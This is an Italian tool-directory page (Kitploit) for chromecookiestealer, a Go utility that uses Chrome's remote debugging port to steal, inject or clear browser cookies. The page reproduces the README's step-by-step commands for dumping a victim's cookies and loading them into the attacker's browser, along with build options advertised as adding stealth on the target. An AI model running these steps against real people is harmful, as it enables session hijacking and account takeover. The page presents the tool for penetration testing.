Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
chromecookiestealer — Rubare/Iniettare i cookie di Chrome tramite il protocollo DevTools (--remote-debugging-port). | Kitploit
Strumenti/GitHubGitHub/magisterquis/chromecookiestealer
Esfiltrazione DatiRaccolta InformazioniSicurezza WebPenetration Testing
GitHubmagisterquis/chromecookiestealer

chromecookiestealer

Rubare/Iniettare i cookie di Chrome tramite il protocollo DevTools (--remote-debugging-port).

Vedi Repository
115143 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Ladro di cookie di Chrome (e iniettore)

Si collega a Chrome utilizzando il suo protocollo Remote DevTools e ruba/inietta/cancella/elimina i cookie.

Fortemente ispirato da WhiteChocolateMacademiaNut.

I cookie vengono scaricati come oggetti JSON utilizzando il formato nativo di Chrome. Lo stesso formato viene utilizzato per i cookie da caricare.

Solo per uso legale.

Caratteristiche

  • Scarica i cookie di Chrome
  • Inietta i cookie scaricati in (un'altra istanza di) Chrome
  • Cancella i cookie di Chrome
  • Impostazioni predefinite configurabili in fase di compilazione

Avvio rapido

Ruba i cookie di una vittima:

root@kitploit:~
git clone https://github.com/magisterquis/chromecookiestealer.git
cd chromecookiestealer
go build
pkill Chrome
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --restore-last-session # Varia in base al target
./chromecookiestealer -dump ./cookies.json

Inietta nel browser locale dell'attaccante:

root@kitploit:~
# Avvia Chrome con una porta di debug, come sopra.
./chromecookiestealer -clear -inject ./cookies.json

Utilizzo

root@kitploit:~
Usage: chromecookiestealer [options]
Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)
and, in order and as requested:

- Dumps cookies
- Clears cookies
- Injects cookies
- Deletes selected cookies

Parameters for cookies to be deleted should be represented as an array of JSON
objects with the following string fields:

name   - Name of the cookies to remove.
url    - If specified, deletes all the cookies with the given name where domain
         and path match provided URL.
domain - If specified, deletes only cookies with the exact domain.
path   - If specified, deletes only cookies with the exact path.

Filenames may also be "-" for stdin/stdout.

Options:
  -chrome URL
    	Chrome remote debugging URL (default "ws://127.0.0.1:9222")
  -clear
    	Clear browser cookies
  -delete file
    	Name of file containing parameters for cookies to delete
  -dump file
    	Name of file to which to dump stolen cookies
  -inject file
    	Name of file containing cookies to inject
  -no-summary
    	Don't print a summary on exit
  -verbose
    	Enable verbose logging

Compilazione

go build dovrebbe essere sufficiente. Le seguenti variabili possono essere impostate in fase di compilazione con -ldflags '-X main.Foo=bar' per un maggiore furtività sul target.

Nessuna delle precedenti è impostata per impostazione predefinita.

Il Chrome DevTools Protocol è un bersaglio in movimento. Potrebbe essere necessario utilizzare una versione più recente delle librerie chromedp e cdproto qualora questo programma smettesse di funzionare. Questo può essere fatto con

root@kitploit:~
go get -u -v all
go mod tidy
go build

che potrebbe avere l'effetto collaterale di rompere tutto il resto.

¯\_(ツ)_/¯

Scarica lo strumento
VariabileDescrizione
DumpFileNome di un file in cui scaricare i cookie. Implica -dump
InjectFileNome di un file da cui iniettare i cookie. Implica -inject
DeleteFileNome di un file con i parametri che descrivono i cookie da eliminare. Implica -delete
DoClearSe impostato a qualsiasi valore, implica -clear